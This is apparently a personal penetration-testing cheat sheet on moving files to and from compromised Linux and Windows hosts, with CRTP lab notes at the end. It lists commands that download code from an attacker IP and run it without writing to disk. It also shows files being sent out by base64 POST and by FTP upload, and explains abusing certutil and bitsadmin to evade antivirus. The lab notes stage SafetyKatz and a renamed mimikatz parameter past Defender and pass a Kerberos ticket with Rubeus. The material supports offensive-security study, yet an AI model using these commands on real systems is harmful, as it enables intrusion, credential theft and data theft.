# File Transfers ## Linux ### Servers {% tabs %} {% tab title="HTTP (DL)" %} ```bash # Python3 python3 -m http.server # Python 2.7 python2.7 -m SimpleHTTPServer # PHP php -S 0.0.0.0:8000 # Ruby ruby -run -ehttpd . -p8000 ``` {% endtab %} {% tab title="HTTP (UL)" %} {% code overflow="wrap" %} ```bash # Python3 python3 -m uploadserver # Netcat nc -lvnp 1337 ``` {% endcode %} An HTTPS server can also be created: {% code overflow="wrap" %} ```bash # Create self-signed cert openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' # Create and move to webroot (must be different dir from the cert) mkdir https && cd https # Start web server using the cert sudo python3 -m uploadserver 443 --server-certificate /root/server.pem # Upload from the target curl -X POST https://10.10.10.10/upload -F 'files=@file1' -F 'files=@file1' --insecure ``` {% endcode %} {% endtab %} {% tab title="SMB (UL)" %} SMB (Server Message Block) is a Windows-native protocol primarily used for file and printer sharing on local networks. It operates at a lower level, allowing direct access to files, directories, and network shares, often integrated into Windows Explorer and supporting authentication, locking, and permissions. Start a SMB server: ```bash # Unauthenticated [Authenticated] sudo impacket-smbserver share -smb2support / [-user test -password test] ``` Connect to the server from the client and transfer the target file: ```bash net use z: \\\share [/user:test test] # Transfer copy z:\ ``` {% endtab %} {% tab title="FTP (UL)" %} ```bash sudo python3 -m pyftpdlib --port 21 --write ``` {% endtab %} {% tab title="WebDav (UL)" %} WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP/HTTPS that allows users to manage files on a remote web server. It is more platform-agnostic and works over standard web ports, making it easier to traverse firewalls, but it generally has higher latency and fewer low-level filesystem features compared to SMB. Start the WebDav server: ```bash # Install libraries sudo pip install wsgidav cheroot # Start server sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` Browser the share or transfer the target file: ```bash # Browse the share dir \\\DavWWWRoot # Transfer a file \Windows\Temp\ \\\DavWWWRoot\ ``` {% endtab %} {% endtabs %} ### Utilities {% tabs %} {% tab title="Download" %} [Wget](https://www.gnu.org/software/wget/) is a CLI utility for retrieving files from the web using HTTP, HTTPS, and FTP protocols. It supports recursive downloads, resume capabilities, and background operation. Offensive operators often use `wget` to fetch binaries or scripts from remote servers because it is widely available on Linux systems and can operate quietly in automated workflows. {% code overflow="wrap" %} ```bash wget http://10.10.10.10/nc.exe -O nc.exe # Fileless execution (-q: quiet mode, -O: specifies the output, -O-: redirects output to stdout) wget -qO- https://172.16.10.1/script.py | python3 ``` {% endcode %} [Curl](https://curl.se/) is a CLI tool and library for transferring data with URLs, supporting a wide range of protocols including HTTP, HTTPS, FTP, and SCP. It allows fine-grained control over headers, authentication, and request methods, making it useful for downloading files, interacting with APIs, or exfiltrating data in offensive operations. ```bash curl http://10.10.10.10/script.sh -o /tmp/script.sh # Fileless execution curl https://172.16.10.1/script.sh | bash ``` [SCP](https://linux.die.net/man/1/scp) (Secure Copy) is a CLI utility for securely transferring files between hosts over SSH. It provides encryption for both authentication and data transfer, making it a reliable method to move files across remote systems in penetration testing or red team engagements while maintaining confidentiality and integrity. ```bash scp user@172.16.10.10:/tmp/nc.exe ./nc.exe ``` [`/dev/tcp`](https://tldp.org/LDP/abs/html/devref1.html) can also be used for fileless execution: ```bash # Connect to the target webserver exec 3<>/dev/tcp/10.10.10.32/80 # HTTP GET request echo -e "GET /script.sh HTTP/1.1\n\n">&3 # Print the response cat <&3 ``` {% endtab %} {% tab title="Upload" %} The SCP utility can be used to upload a file to the target: ```bash scp revshell.sh user@172.16.10.10:/tmp/revshell.sh ``` {% endtab %} {% endtabs %} ## Windows ### Servers {% tabs %} {% tab title="SMB" %} Create an SMB share: ```powershell # Create a new share > New-SmbShare -Name "shared" -Path "C:\Users\x7331" -FullAccess "Everyone" Name ScopeName Path Description ---- --------- ---- ----------- shared * C:\Users\x7331 # Confirm the share is up > Get-SmbShare Name ScopeName Path Description ---- --------- ---- ----------- ADMIN$ * C:\Windows Remote Admin C$ * C:\ Default share IPC$ * Remote IPC shared * C:\Users\x7331 ``` Access it from the target via File Explorer at `\\10.10.10.10\shared`. {% endtab %} {% tab title="WebDav (SMB over HTTP)" %} ```powershell # to a Linux WebDav server copy C:\Users\john\Desktop\SourceCode.zip \\10.10.10.10\DavWWWRoot\ ``` {% endtab %} {% endtabs %} ### Downloads {% tabs %} {% tab title="wget" %} ```powershell wget http://10.10.10.10/nc.exe -O c:\windows\temp\nc.exe ``` {% endtab %} {% tab title="cURL" %} ```powershell curl http://10.10.10.10/nc.exe -o nc.exe ``` {% endtab %} {% tab title="IWR" %} ```powershell Invoke-WebRequest https://10.10.10.10/nc.exe -OutFile c:\windows\temp\nc.exe ``` {% endtab %} {% tab title="bitsadmin" %} [Bitsadmin](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin) is a Windows CLI utility designed to create, manage, and monitor Background Intelligent Transfer Service (BITS) jobs, which are normally used to download or upload files asynchronously with network throttling. Offensive operators leverage bitsadmin to transfer files covertly, as it uses a system service that often bypasses standard firewall and proxy restrictions and avoids immediate antivirus detection. The `/transfer` flag specifies that the operation is a [transfer job](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-transfer), while `n` is simply the name assigned to that job for tracking or management purposes. ```sh bitsadmin /transfer n http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe ``` {% endtab %} {% tab title="certutil" %} [Certutil](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil) is a Windows CLI tool for managing certificates and keys, but it is often abused offensively because it can download files, encode or decode data, and interact with certificate stores while evading most antivirus detections, making it useful for file transfer or malware staging in administrative environments. The `-split` flag ensures that large files are split and reassembled correctly during download, preventing corruption. The `-f` flag forces the operation, overwriting any existing file with the same name without prompting. ```sh certutil.exe -split -f http://10.10.10.10/nc.exe nc.exe ``` {% endtab %} {% tab title="PHP" %} {% code overflow="wrap" %} ```powershell php -r '$file = file_get_contents("https://10.10.10.10/file1"); file_put_contents("$file",file1);' ``` {% endcode %} {% endtab %} {% endtabs %} {% tabs %} {% tab title="Net.WebClient" %} {% code overflow="wrap" %} ```powershell (New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file1','c:\temp\file1') ``` {% endcode %} {% endtab %} {% tab title="scp" %} ```powershell scp user@172.16.10.10:/tmp/file1 c:\temp\file1 ``` {% endtab %} {% tab title="SMB" %} ```powershell # Unauthenticated copy \\10.10.10.10\share\file1 # Authenticated # Connect to the share net use n: \\10.10.10.10\share /user:test test # Transfer copy n:\file1 ``` {% endtab %} {% endtabs %} Fileless execution: {% tabs %} {% tab title="IEX" %} {% code overflow="wrap" %} ```powershell (New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file1','c:\temp\file1') | IEX ``` {% endcode %} {% endtab %} {% endtabs %} ### Uploads {% tabs %} {% tab title="IWR" %} 
# encode file
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:\temp\file1' -Encoding Byte))
# upload file
Invoke-WebRequest -Uri http://10.10.10.10 -Method POST -Body $b64
{% endtab %} {% tab title="FTP" %} 
(New-Object Net.WebClient).UploadFile('ftp://10.10.10.10/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
{% endtab %} {% tab title="scp" %} ```powershell scp C:\Temp\file1 user@10.10.10.10:/tmp/file1 ``` {% endtab %} {% endtabs %} ## Misc ### b64 {% tabs %} {% tab title="Windows to Linux" %} ```powershell # encode file on Windows [Convert]::ToBase64String((Get-Content -path "c:\temp\file1" -Encoding byte)) # copy the output and decode it on Linux echo IyBDb3B5...YWxob3N0DQo= | base64 -d > file1 ``` {% endtab %} {% tab title="Linux to Windows" %} {% code overflow="wrap" %} ```bash # encode file (-w --> wrap, use 0 to disable line wrapping) cat file1 | base64 -w 0;echo # decode on PowerShell [IO.File]::WriteAllBytes("c:\temp\file1", [Convert]::FromBase64String("LS0tL...0tLQo=")) ``` {% endcode %} {% endtab %} {% endtabs %} ### Linux {% tabs %} {% tab title="Python3 Upload" %} {% code overflow="wrap" %} ```bash # starting an uploadserver python3 -m uploadserver # uploading a file python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("file1","rb")})' ``` {% endcode %} {% endtab %} {% tab title="Python Download" %} {% code overflow="wrap" %} ```bash # python2.7 python2.7 -c 'import urllib;urllib.urlretrieve ("https://script.sh", "script.sh")' # python3 python3 -c 'import urllib.request;urllib.request.urlretrieve("https://script.sh", "script.sh")' ``` {% endcode %} {% endtab %} {% endtabs %} {% tabs %} {% tab title="PHP Download (1)" %} {% code overflow="wrap" %} ```bash php -r '$file = file_get_contents("https://10.10.10.10/script.sh"); file_put_contents("script.sh",$file);' ``` {% endcode %} {% endtab %} {% tab title="PHP Download (2)" %} {% code overflow="wrap" %} ```bash php -r 'const BUFFER = 1024; $fremote = fopen("https://10.10.10.10/script.sh", "rb"); $flocal = fopen("script.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' ``` {% endcode %} {% endtab %} {% tab title="PHP Fileless Execution" %} {% code overflow="wrap" %} ```bash php -r '$lines = @file("https://10.10.10.10/script.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash ``` {% endcode %} {% endtab %} {% endtabs %} {% tabs %} {% tab title="PERL" %} {% code overflow="wrap" %} ```bash perl -e 'use LWP::Simple; getstore("https://10.10.10.10/script.sh", "script.sh");' ``` {% endcode %} {% endtab %} {% tab title="Ruby" %} {% code overflow="wrap" %} ```bash ruby -e 'require "net/http"; File.write("script.sh", Net::HTTP.get(URI.parse("https://10.10.10.10/script.sh")))' ``` {% endcode %} {% endtab %} {% endtabs %} ### Windows {% tabs %} {% tab title="1. JS -> Create Script" %} ```javascript # create a file called `wget.js` var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); ``` {% endtab %} {% tab title="2. CMD/PS -> Execute Script" %} {% code overflow="wrap" %} ```powershell # execute script cscript.exe /nologo wget.js https://10.10.10.10/script.ps1 script.ps1 ``` {% endcode %} {% endtab %} {% endtabs %} {% tabs %} {% tab title="1. VBScript -> Create Script" %} ```vba # create a file called `wget.vbs` dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Item(1), 2 end with ``` {% endtab %} {% tab title="2. CMD/PS -> Execute Script" %} {% code overflow="wrap" %} ```powershell # execute script cscript.exe /nologo wget.vbs https://10.10.10.10/script.ps1 script.ps1 ``` {% endcode %} {% endtab %} {% endtabs %} ## CRTP {% tabs %} {% tab title="LO7" %} Transfer files from the attacking host to a compromised host (`dcorp-ci`): ```powershell iwr http://172.16.100.37/Loader.exe -OutFile c:\users\public\Loader.exe ``` Copy the file from `dcorp-ci` to the target host (`dcorp-mgmt`): {% code overflow="wrap" %} ```powershell echo F | xcopy c:\users\public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe ``` {% endcode %} If we run `SafetyKatz` via the `Loader` directly from the webserver, MD will complain about it because it includes an external IP address (attacker's IP): {% code overflow="wrap" %} ```powershell winrs -r:dcorp-mgmt "cmd /c C:\users\public\Loader.exe -path http://172.16.100.37/SafetyKatz.exe sekurlsa::evasive-keys exit" ``` {% endcode %} A workaround would be to do it via a port forward. Any connection made to `dcorp-mgmt` port `8080` will be forwarded to the attacker's machine port `80`: {% hint style="info" %} The `sekurlsa` parameter `ekeys` was renamed to `evasive-keys` to avoid MD flagging. {% endhint %} {% code overflow="wrap" %} ```sh # Create a port forward from dcorp-mgmt to the attacker machine $null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.37" # Download and execute binary via localhost winrs -r:dcorp-mgmt "cmd /c C:\users\public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::evasive-keys exit" ``` {% endcode %} Now we can OtH: {% code overflow="wrap" %} ```powershell Loader.exe -path Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:c:\windows\system32\cmd.exe /show /ptt ``` {% endcode %} A new shell will spawn in the `svcadmin` context. This is a remote type 9 login, so the context will show only when accessing a remote host {% code overflow="wrap" %} ```sh > klist Current LogonId is 0:0x6666f8a Cached Tickets: (1) #0> Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize > whoami dcorp\student337 > winrs -r:dcorp-dc cmd /c set username USERNAME=svcadmin # List running services and as who they run as >winrs -r:dcorp-mgmt cmd /c wmic service get Name,State,StartName MSSQLSERVER dcorp\svcadmin Running >winrs -r:dcorp-mgmt cmd /c powershell "Get-WmiObject Win32_Service | Where-Object { $_.StartName -like '*svcadmin*' } | Select Name, StartName, State" Name StartName State ---- --------- ----- MSSQLSERVER dcorp\svcadmin Running ``` {% endcode %} {% endtab %} {% tab title="LO7" %} {% code overflow="wrap" %} ```powershell Copy-Item .\Invoke-Mimi.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files' ``` {% endcode %} {% endtab %} {% endtabs %}